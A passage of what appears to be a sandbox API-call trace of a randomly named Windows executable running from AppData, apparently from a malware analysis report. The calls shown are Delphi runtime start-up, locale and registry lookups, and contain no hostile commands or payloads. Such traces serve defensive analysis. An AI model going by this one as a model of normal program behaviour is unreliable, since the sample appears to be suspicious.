(hModule=0x76910000, 
lpProcName="LocalAlloc") returned 0x76963363 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0099.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0099.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0099.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0099.703] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 
[0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0099.703] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0099.704] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0099.704] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0099.704] LoadLibraryA 
(lpLibFileName="shell32.dll") returned 0x75830000 [0099.704] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0099.704] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0099.704] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0099.705] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0099.705] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0099.705] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.705] SetThreadLocale (Locale=0x400) returned 1 [0099.705] GetVersion () returned 0x1db10106 [0099.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.706] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") 
returned 0x769522d7 [0099.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.706] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0099.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.706] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0099.706] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0099.706] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.706] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0099.706] GetACP () returned 0x4e4 [0099.706] GetCurrentThreadId () returned 0xc18 [0099.706] GetVersion () returned 0x1db10106 [0099.706] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x6f1d20, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.706] 
GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.706] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.706] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x13f0000 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] GetUserDefaultUILanguage () returned 0x409 [0099.708] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0099.708] GetThreadUILanguage () returned 0x120409 [0099.708] GetThreadPreferredUILanguages (in: dwFlags=0x38, 
pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0099.708] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768) returned 1 [0099.708] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.708] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.709] GetUserDefaultUILanguage () returned 0x409 [0099.709] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0099.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0099.709] LoadStringW (in: 
hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 
[0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0099.710] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, 
dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.710] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0099.710] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x7044e0 [0099.710] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0099.710] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0099.711] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0099.711] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0099.711] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The 
specified file was not found") returned 0x20 [0099.711] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.711] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x14e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0099.711] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0099.711] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: 
hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] GetThreadLocale () returned 0x409 [0099.711] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0099.711] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0099.711] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.711] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0099.711] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0099.711] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x7044f0 [0099.711] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0099.712] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0099.712] GetLastError () returned 0x7a [0099.712] GetLogicalProcessorInformation (in: Buffer=0x14d99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14d99d0, ReturnedLength=0x12fab0) returned 1 [0099.712] GetCurrentThreadId () returned 0xc18 [0099.712] GetCurrentThreadId () returned 0xc18 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0099.712] GetThreadLocale () returned 0x409 [0099.712] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0099.712] GetThreadLocale () returned 0x409 [0099.712] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, 
Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0099.712] GetCurrentThreadId () returned 0xc18 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0099.712] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0099.713] 
